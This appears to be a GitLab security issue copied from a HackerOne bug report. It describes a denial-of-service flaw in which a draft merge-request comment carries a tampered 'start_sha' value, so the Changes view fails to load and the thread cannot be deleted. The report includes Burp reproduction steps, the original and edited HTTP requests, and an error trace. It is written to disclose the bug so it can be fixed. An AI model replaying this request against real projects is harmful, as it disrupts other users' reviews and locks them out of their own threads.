Invalid 'start_sha' value in POST `/{group}/{project}/-/merge_requests/{id}/drafts` when comment on merge requests leads to changes unable to load

⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2058514 by toukakirishima on 2023-07-09, assigned to GitLab Team:

Report | Attachments | How To Reproduce

Report

Summary

I found a DOS vulnerability when comment on file merge requests (on the Changes menu). I noticed if start_sha is not validated first it causes DOS (user can't load file on Changes menu and cant delete the thread).

Normally you can delete threads that you have created.

And can load files on Changes menu.

But as an attacker I can make the victim unable to load file on Changes menu and cant delete the thread. Even admin can't delete thread.

Let's say Touka Attacker is the attacker and Touka Kirishima is the victim.

And Touka Kirishima (victim) made Merge requests.

Steps to reproduce

1. Go to merge requests

2. Go to Changes menu

3. Comment on this file

4. Click Start a review and makesure burpsuite is on. You will see request like following, Example :

POST /toukak/aaaa/-/merge_requests/4/drafts HTTP/2  
Host: gitlab.com  
Cookie: x  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0  
Accept: application/json, text/plain, */*  
Accept-Language: id,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: https://gitlab.com/toukak/aaaa/-/merge_requests/4/diffs  
X-Csrf-Token: x  
X-Requested-With: XMLHttpRequest  
Content-Type: application/json  
Content-Length: 707  
Origin: https://gitlab.com  
Dnt: 1  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Te: trailers

{"line_type":"old","merge_request_diff_head_sha":"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9","in_reply_to_discussion_id":"","note_project_id":"","target_type":"merge_request","target_id":235434679,"return_discussion":true,"draft_note":{"note":"Hehe","position":"{\"base_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c1538279f\",\"start_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c1538279f\",\"head_sha\":\"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9\",\"old_path\":\"hehe\",\"new_path\":\"hehe\",\"position_type\":\"file\",\"old_line\":null,\"new_line\":null,\"line_range\":{},\"ignore_whitespace_change\":false}","noteable_type":"MergeRequest","noteable_id":235434679,"commit_id":null,"type":"DiffNote","line_code":null}}  

5. Send to Repeater
6. Change start_sha. Example :

POST /toukak/aaaa/-/merge_requests/4/drafts HTTP/2  
Host: gitlab.com  
Cookie: x  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0  
Accept: application/json, text/plain, */*  
Accept-Language: id,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: https://gitlab.com/toukak/aaaa/-/merge_requests/4/diffs  
X-Csrf-Token: x  
X-Requested-With: XMLHttpRequest  
Content-Type: application/json  
Content-Length: 707  
Origin: https://gitlab.com  
Dnt: 1  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Te: trailers

{"line_type":"old","merge_request_diff_head_sha":"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9","in_reply_to_discussion_id":"","note_project_id":"","target_type":"merge_request","target_id":235434679,"return_discussion":true,"draft_note":{"note":"Hehe","position":"{\"base_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c1538279f\",\"start_sha\":\"fe0ced6306a3fe0b992d2c4a9204169c15382791\",\"head_sha\":\"d5d27e5e75cb66f567f39c7fe8ea2daea67f03a9\",\"old_path\":\"hehe\",\"new_path\":\"hehe\",\"position_type\":\"file\",\"old_line\":null,\"new_line\":null,\"line_range\":{},\"ignore_whitespace_change\":false}","noteable_type":"MergeRequest","noteable_id":235434679,"commit_id":null,"type":"DiffNote","line_code":null}}  

7. Click Send
8. Finish and Submit review

9. Reload the page and you unable to load file on Changes menu and cant delete the thread

POV from Attacker

POV from Victim

POC

bandicam_2023-07-09_19-04-28-764.mp4

Relevant logs and/or screenshots

TypeError: this.discussion.diff_file is null diffViewerMode diff_with_note.vue:44 VueJS 3 get evaluate Gr isTextFile diff_with_note.vue:56 VueJS 3 get evaluate Gr U diff_with_note.vue:1 VueJS 52 _render r get t mount $mount init d d g d g d g d g d g d Lo _update r get t mount $mount init d d Lo _update r get t mount $mount init d d D E E E E Lo _update r get run mr Cn _n instrument.js:108:32 kt instrument.js:108 VueJS 55 mn gn pn _render r get t mount $mount init d d g d g d g d g d g d Lo _update r get t mount $mount init d d Lo _update r get t mount $mount init d d D E E E E Lo _update r get run mr Cn _n

Output of checks

This bug happens on GitLab.com

Impact

• Attacker can make the victim unable to load file on Changes menu.
• Attacker can make the victim cant delete the thread. Even admin can't delete thread.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

• gambar.png
• gambar.png
• gambar.png
• Screenshot_10.png
• gambar.png
• gambar.png
• gambar.png
• gambar.png
• Screenshot_12.png
• gambar.png
• gambar.png
• Screenshot_13.png
• gambar.png
• Screenshot_14.png
• Screenshot_15.png
• Screenshot_16.png
• gambar.png
• bandicam_2023-07-09_19-04-28-764.mp4

How To Reproduce

Please add reproducibility information to this section: